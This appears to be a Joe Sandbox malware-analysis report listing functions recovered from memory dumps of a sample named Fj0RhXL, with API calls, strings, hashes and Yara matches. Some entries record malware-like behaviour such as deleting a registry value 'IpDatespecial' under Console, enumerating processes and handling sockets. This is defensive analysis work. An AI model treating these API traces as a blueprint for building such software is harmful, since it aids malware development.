Snapshot File: hcaresult_6_2_32b0000_Fj0RhXL.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
Instruction ID: 2cb1bb3120389844501e5cf404e3ee3a778d3e1529e4bca3855dbe95478dcf99
Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
Instruction Fuzzy Hash: AE01EC7902024ABFDF12DE51CC44EEA7F69EF08354F048518BE1819121D77695A1DBA1

Function 02F13B60 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 02F13B73

Part of subcall function 02F13ACE: ___BuildCatchObjectHelper.LIBCMT ref: 02F13B04

_UnwindNestedFrames.LIBCMT ref: 02F13B8A
___FrameUnwindToState.LIBCMT ref: 02F13B98

Strings

csm, xrefs: 02F13B62
csm, xrefs: 02F13B6F, 02F13B84, 02F13B97, 02F13BB5, 02F13BC5

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
Instruction ID: 1318c293a8e8b2344f899bf9513cd7095fd62a1898f35f44a5963b774604b0eb
Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
Instruction Fuzzy Hash: E701F67540110ABBDF22AF52CC44EAB7F6AEF08394F444094BE1815160E732D9B1DFA1

Function 6C3C8E1F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

Part of subcall function 6C3C8DC8: _fprintf.LIBCMT ref: 6C3C8DDC

_fprintf.LIBCMT ref: 6C3C8E43
_fprintf.LIBCMT ref: 6C3C8E58
_fprintf.LIBCMT ref: 6C3C8E6A

Strings

]0 setdash, xrefs: 6C3C8E5F
[%d %d, xrefs: 6C3C8E38

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _fprintf
String ID: [%d %d$]0 setdash
API String ID: 1654120334-3947119172
Opcode ID: bda50100d3e777e0c44a8d49efb6efc870366485c9890fa0d0709fb5680cc153
Instruction ID: 7aa721df6bf711763f72f4d8219bd6d3f98971bb776c7cddad11cfdc072188c7
Opcode Fuzzy Hash: bda50100d3e777e0c44a8d49efb6efc870366485c9890fa0d0709fb5680cc153
Instruction Fuzzy Hash: CBE02232B062206ADA42B325AC01E0CB770C347B0C7209427E008ABA50D732ADD559C3

Function 03D964C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 03D964D7
RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 03D964E7
RegCloseKey.ADVAPI32(?), ref: 03D964F2

Strings

Console, xrefs: 03D964CD
IpDatespecial, xrefs: 03D964E1

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: CloseDeleteOpenValue
String ID: Console$IpDatespecial
API String ID: 849931509-1840232981
Opcode ID: fe37158da740e3670bc47c230e9f8ad2944d0e54392e6cafe5b7c87d6f326af0
Instruction ID: 3f57b07058c7c98078290913a2bf6ee0328232d87ad11f73e2f77fe8ddf28d63
Opcode Fuzzy Hash: fe37158da740e3670bc47c230e9f8ad2944d0e54392e6cafe5b7c87d6f326af0
Instruction Fuzzy Hash: 1EE08673245340EFD320A660AC4FF997764F78C712F04490DF645A1285D561E524C765

Function 03D81BE0 Relevance: 7.7, APIs: 5, Instructions: 177COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 03D81C84
_memmove.LIBCMT ref: 03D81CA0

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 220294bf03629286aa4368727a6f7a2f69b2a938bfb709ea968c309f702b79a4
Instruction ID: 1b67cb44940b4643ff10e5bb8243d4bdc372459702c65ebb87dd7828e0abfe29
Opcode Fuzzy Hash: 220294bf03629286aa4368727a6f7a2f69b2a938bfb709ea968c309f702b79a4
Instruction Fuzzy Hash: 9F613C75A01606AFCB18EF69C580BA9F7E5FF08614F54866DD85ACB700E730F949CB90

Function 03D96660 Relevance: 7.6, APIs: 5, Instructions: 116processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,90594F2A), ref: 03D966AA
_memset.LIBCMT ref: 03D966CB
_memset.LIBCMT ref: 03D9671B
Process32FirstW.KERNEL32(00000000,?), ref: 03D96735
Process32NextW.KERNEL32(00000000,0000022C), ref: 03D96787

Part of subcall function 03D9ABD2: _malloc.LIBCMT ref: 03D9ABEC

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Process32_memset$CreateFirstNextSnapshotToolhelp32_malloc
String ID:
API String ID: 2416807333-0
Opcode ID: d2d620f2b4d74cbf403e4581d40258f7cda19caaf58fc07c23cd27e09e76ad5f
Instruction ID: 40e6cde1a91b7f2ca609d5459c51136dd8592eea7a3bb9513ed514519806a3fc
Opcode Fuzzy Hash: d2d620f2b4d74cbf403e4581d40258f7cda19caaf58fc07c23cd27e09e76ad5f
Instruction Fuzzy Hash: 9341C671A00605DEEB10DF74CC85FAAB3B8EF45B24F044696E9199B2C0E775DA84CBA1

Function 03D83C70 Relevance: 7.6, APIs: 5, Instructions: 98networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,00000598,00000000), ref: 03D83C8F
SetLastError.KERNEL32(00000000,?,?,03D8396F,?,?,00000000,000000FF,00000000), ref: 03D83CCA
GetLastError.KERNEL32(00000000), ref: 03D83D15
WSAGetLastError.WS2_32(?,?,03D8396F,?,?,00000000,000000FF,00000000), ref: 03D83D4B
WSASetLastError.WS2_32(0000000D,?,?,03D8396F,?,?,00000000,000000FF,00000000), ref: 03D83D72

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: ErrorLast$recv
String ID:
API String ID: 316788870-0
Opcode ID: 0b166aa879ee4be1be63300584875a3b9e71f316e2a20a632b1fd00846478880
Instruction ID: a66afc534047ac868270ec3e0beeb340d90e19140f16daba6aafc8861a578b50
Opcode Fuzzy Hash: 0b166aa879ee4be1be63300584875a3b9e71f316e2a20a632b1fd00846478880
Instruction Fuzzy Hash: 9E31C77F604200DBEB54FF68E4C4B6977A9EB85B24F14056AED09CB385D731F8818761

Function 02F03C90 Relevance: 7.6, APIs: 5, Instructions: 98networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,00000598,00000000), ref: 02F03CAF
SetLastError.KERNEL32(00000000,?,?,02F0398F,?,?,00000000,000000FF,00000000), ref: 02F03CEA
GetLastError.KERNEL32(00000000), ref: 02F03D35
WSAGetLastError.WS2_32(?,?,02F0398F,?,?,00000000,000000FF,00000000), ref: 02F03D6B
WSASetLastError.WS2_32(0000000D,?,?,02F0398F,?,?,00000000,000000FF,00000000), ref: 02F03D92

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: ErrorLast$recv
String ID:
API String ID: 316788870-0
Opcode ID: 0958b70a7771e32f5d268351d4f41f7c20151df46ca5f61b6efdd4789cb54c23
Instruction ID: 0556ef6ce553100b9b7d721575d548aaeac0ae73c73ac8ea7d913e182cd0c33e
Opcode Fuzzy Hash: 0958b70a7771e32f5d268351d4f41f7c20151df46ca5f61b6efdd4789cb54c23
Instruction Fuzzy Hash: EE312C72A052049FEB249F68E8C875977A9FB843A4F9145A6EF06CF2C5D731D8C0DB50

Function 03D89520 Relevance: 7.6, APIs: 5, Instructions: 91stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 03D89538
_memset.LIBCMT ref: 03D89542
lstrlenW.KERNEL32(?), ref: 03D8954B
lstrlenW.KERNEL32(?), ref: 03D89556

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: lstrlen$_memset
String ID:
API String ID: 2425037729-0
Opcode ID: 22259c1af89cb8a3b692209fbe61f140a5860c4150ea0bd7b7cf87d3a12afaca
Instruction ID: f541c57d1a9f5044a45839e4f2146c40f7d5cfdd4080c1b5b848e24fa31345a0
Opcode Fuzzy Hash: 22259c1af89cb8a3b692209fbe61f140a5860c4150ea0bd7b7cf87d3a12afaca
Instruction Fuzzy Hash: 6721FB76B011085BCB14EF59D8909BEB3ADEBC4B10B1940EDEC49C7601F731ED5187A0

Function 6C3EDEB5 Relevance: 7.6, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,?,?,6C443338,0000000C), ref: 6C3EDEE9
GetLastError.KERNEL32(?,?,6C443338,0000000C), ref: 6C3EDEF3
__dosmaperr.LIBCMT ref: 6C3EDEFA
__alloc_osfhnd.LIBCMT ref: 6C3EDF1B
__set_osfhnd.LIBCMT ref: 6C3EDF45

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: ErrorFileLastType__alloc_osfhnd__dosmaperr__set_osfhnd
String ID:
API String ID: 43408053-0
Opcode ID: 73ae4a9a28e3ce963359d0c9717f87ef8f86b400ee813406beac6130cbdf426d
Instruction ID: 80f61a2922cd2f3f937ad3e1af8fb2ae98a0e5d34a6bddbfe58f184b75d8233e
Opcode Fuzzy Hash: 73ae4a9a28e3ce963359d0c9717f87ef8f86b400ee813406beac6130cbdf426d
Instruction Fuzzy Hash: 5621F5315456249ADB01CF78C4047C97B60AFCA32CF288B46E4B08BAD6DB36D286DF91

Function 03D9B770 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 03D9B77E

Part of subcall function 03D9AB3E: __FF_MSGBANNER.LIBCMT ref: 03D9AB57
Part of subcall function 03D9AB3E: __NMSG_WRITE.LIBCMT ref: 03D9AB5E
Part of subcall function 03D9AB3E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE), ref: 03D9AB83

_free.LIBCMT ref: 03D9B791

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: ceec27e40db32262e7f2440d3df7552dcf9a636204382b1380cb2da06f6d3af7
Instruction ID: 9d992f08e0fdd7ec9c14d17aff17804564c90cea04485178ce7949d9ac7d0823
Opcode Fuzzy Hash: ceec27e40db32262e7f2440d3df7552dcf9a636204382b1380cb2da06f6d3af7
Instruction Fuzzy Hash: 9411A737504715ABEF22FB74BC04A593799EF446B1F264A27F8499E350EE34C84086B0

Function 02F0E6E7 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 02F0E6F5

Part of subcall function 02F06F93: __FF_MSGBANNER.LIBCMT ref: 02F06FAC
Part of subcall function 02F06F93: __NMSG_WRITE.LIBCMT ref: 02F06FB3
Part of subcall function 02F06F93: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02F0A080,00000000,00000001,00000000,?,02F0C1E0,00000018,02F17BF0,0000000C,02F0C270), ref: 02F06FD8

_free.LIBCMT ref: 02F0E708

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 54df5518081aff80901a3de5f300f1f05b259e67c60bc3fa28ec47a6215e9ace
Instruction ID: ff8027c19473cf666b83df23db73d56e4167c2255ba9ce30e1475d74f9930aee
Opcode Fuzzy Hash: 54df5518081aff80901a3de5f300f1f05b259e67c60bc3fa28ec47a6215e9ace
Instruction Fuzzy Hash: CF11EB33E4461D9BCF213B74AC847597796AF443E0B110C65FB65DA1C0DB70A850AE94

Function 03D85410 Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 03D8543F

Part of subcall function 03D99D93: _setlocale.LIBCMT ref: 03D99DA5

_free.LIBCMT ref: 03D85451

Part of subcall function 03D9AB04: RtlFreeHeap.NTDLL(00000000,00000000,?,03DA2A36,00000000,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE), ref: 03D9AB1A
Part of subcall function 03D9AB04: GetLastError.KERNEL32(00000000,?,03DA2A36,00000000,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE,00000000), ref: 03D9AB2C

_free.LIBCMT ref: 03D85464
_free.LIBCMT ref: 03D85477
_free.LIBCMT ref: 03D8548A

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
String ID:
API String ID: 3515823920-0
Opcode ID: 4535ae06831067b87fd14e76a6acc9de9d03e6a76d265c670efcbba8b8384e40
Instruction ID: a7f62d0abae8e0f65dfb67ae52e1d943081fd090a471392b587c8825da3ecbe6
Opcode Fuzzy Hash: 4535ae06831067b87fd14e76a6acc9de9d03e6a76d265c670efcbba8b8384e40
Instruction Fuzzy Hash: 4011B2F2900710ABDB20EF69D800A5BF7EADB40A10F188A2BD416C7640D635F504CBA1

Function 02F02BD0 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 02F02BFF
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 02F02C15
TranslateMessage.USER32(?), ref: 02F02C24
DispatchMessageW.USER32(?), ref: 02F02C2A
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02F02C38

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
String ID:
API String ID: 2015114452-0
Opcode ID: 4560a52e8295b7113838aa60240c63292ca7898e0c581b00bd03ef9c9ae5a1c2
Instruction ID: cbff4a7e6f7fe1b48af66fd250ae22e885414d0798428cde17cfb0ae32b55141
Opcode Fuzzy Hash: 4560a52e8295b7113838aa60240c63292ca7898e0c581b00bd03ef9c9ae5a1c2
Instruction Fuzzy Hash: 4001A972F80309B6F710AAA49C95FBAB36CAB44B94F904911FF04FA1C5DBA0E50597B4

Function 03D84B50 Relevance: 7.5, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000000), ref: 03D84B63
EnterCriticalSection.KERNEL32(?,?,00000000), ref: 03D84B6D
LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 03D84B80
LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 03D84B83

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: e6959bed761d3d291bc7e86a2aa71f6b0d2f037146651639ba1b69b81b070b9e
Instruction ID: e9e94fc49f64fad2517edd3a59db40b5397adc7d59b8138c629ef46ee69c0b0a
Opcode Fuzzy Hash: e6959bed761d3d291bc7e86a2aa71f6b0d2f037146651639ba1b69b81b070b9e
Instruction Fuzzy Hash: 830171771002149BD720EB2AFC84B9BB3E8EB89714F050919E186C3210D734F98686A0

Function 032C3180 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 032C31A8

Part of subcall function 032C2D38: __getptd.LIBCMT ref: 032C2D46
Part of subcall function 032C2D38: __getptd.LIBCMT ref: 032C2D54

__getptd.LIBCMT ref: 032C31B2

Part of subcall function 032B93AB: __getptd_noexit.LIBCMT ref: 032B93AE
Part of subcall function 032B93AB: __amsg_exit.LIBCMT ref: 032B93BB

__getptd.LIBCMT ref: 032C31C0
__getptd.LIBCMT ref: 032C31CE
__getptd.LIBCMT ref: 032C31D9

Part of subcall function 032C2DDD: __CallSettingFrame@12.LIBCMT ref: 032C2E29

Part of subcall function 032C32A6: __getptd.LIBCMT ref: 032C32B5
Part of subcall function 032C32A6: __getptd.LIBCMT ref: 032C32C3

Memory Dump Source

Source File: 00000006.00000002.3622375709.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32b0000_Fj0RhXL.jbxd

Similarity

API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 3282538202-0
Opcode ID: 614a4d17480710d0213c8e438039baab2face61d69a066149231ae24c6ec2870
Instruction ID: 58249b0ca7fa2527aaef5fa0403200140f489a094d9ed553062f2b501f42522d
Opcode Fuzzy Hash: 614a4d17480710d0213c8e438039baab2face61d69a066149231ae24c6ec2870
Instruction Fuzzy Hash: 5C112B75C24309DFDF00EFA4C444AED7BB0FF08310F108569E914AB250DB799A959F60

Function 02F04B40 Relevance: 7.5, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000000), ref: 02F04B53
EnterCriticalSection.KERNEL32(?,?,00000000), ref: 02F04B5D
LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 02F04B70
LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 02F04B73

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 960c87a6af9951f4bbe6e9c62b83f9b0a369f62a292701f4f4df3cc6b7de8b69
Instruction ID: 369218520a7d62285664466921830d325324aeabd3d697f3a2c6c0e7bedc79b6
Opcode Fuzzy Hash: 960c87a6af9951f4bbe6e9c62b83f9b0a369f62a292701f4f4df3cc6b7de8b69
Instruction Fuzzy Hash: 1B018FB6A002149BD7209B69FCC4B5BB7E8EB88794F42082DE20683240C734E8458AA0

Function 03D82D00 Relevance: 7.5, APIs: 5, Instructions: 36COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 03D82D2C
CancelIo.KERNEL32(?), ref: 03D82D36
InterlockedExchange.KERNEL32(00000000,00000000), ref: 03D82D3F
closesocket.WS2_32(?), ref: 03D82D49
SetEvent.KERNEL32(00000001), ref: 03D82D53

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
String ID:
API String ID: 1486965892-0
Opcode ID: 1efef285b15f75664197f64b85aeb58c24bff0b47b0a84029985c1172054a302
Instruction ID: 6dcf11ffc7fb2ed059191af58feb21473a2d286ee2274d063cf9fa0f91e13f7f
Opcode Fuzzy Hash: 1efef285b15f75664197f64b85aeb58c24bff0b47b0a84029985c1172054a302
Instruction Fuzzy Hash: 7EF03777500704EBD220AB94DD49F6BB7B8FB89B11F104E5DB69296784DAB0B904CBA0

Function 03DA3C71 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 03DA3C7D

Part of subcall function 03DA2A45: __getptd_noexit.LIBCMT ref: 03DA2A48
Part of subcall function 03DA2A45: __amsg_exit.LIBCMT ref: 03DA2A55

__getptd.LIBCMT ref: 03DA3C94
__amsg_exit.LIBCMT ref: 03DA3CA2
__lock.LIBCMT ref: 03DA3CB2
__updatetlocinfoEx_nolock.LIBCMT ref: 03DA3CC6

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 0b4b28edefe75b281d170748f72673ec45a3ea9fd38d2f82079e656ebb91440c
Instruction ID: 4d23b19c860631e3d92fe11c98dd32bd25a55299e4f75e37a238a6e11156ad1e
Opcode Fuzzy Hash: 0b4b28edefe75b281d170748f72673ec45a3ea9fd38d2f82079e656ebb91440c
Instruction Fuzzy Hash: 93F0903AA00F10DBD720FB7D9E0575DB7A2EF04B20F148549E4506F2C1CB748A408AA5

Function 032BDC1C Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 032BDC28

Part of subcall function 032B93AB: __getptd_noexit.LIBCMT ref: 032B93AE
Part of subcall function 032B93AB: __amsg_exit.LIBCMT ref: 032B93BB

__getptd.LIBCMT ref: 032BDC3F
__amsg_exit.LIBCMT ref: 032BDC4D
__lock.LIBCMT ref: 032BDC5D
__updatetlocinfoEx_nolock.LIBCMT ref: 032BDC71

Memory Dump Source

Source File: 00000006.00000002.3622375709.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32b0000_Fj0RhXL.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 7e5a8f231e34eb9e22e54707d2784e1f31056cbd1d730f0eb4eb8eac984f07f4
Instruction ID: 2adac8f584cf5c705caffba3a4520b371a3c9a2bf61375f5a7312379a8fc582e
Opcode Fuzzy Hash: 7e5a8f231e34eb9e22e54707d2784e1f31056cbd1d730f0eb4eb8eac984f07f4
Instruction Fuzzy Hash: D7F09036924B109AE720FF789802BDD77B0AF407E4F188149D6516F1C1CFF595C1CA95

Function 02F0E24F Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 02F0E25B

Part of subcall function 02F099DE: __getptd_noexit.LIBCMT ref: 02F099E1
Part of subcall function 02F099DE: __amsg_exit.LIBCMT ref: 02F099EE

__getptd.LIBCMT ref: 02F0E272
__amsg_exit.LIBCMT ref: 02F0E280
__lock.LIBCMT ref: 02F0E290
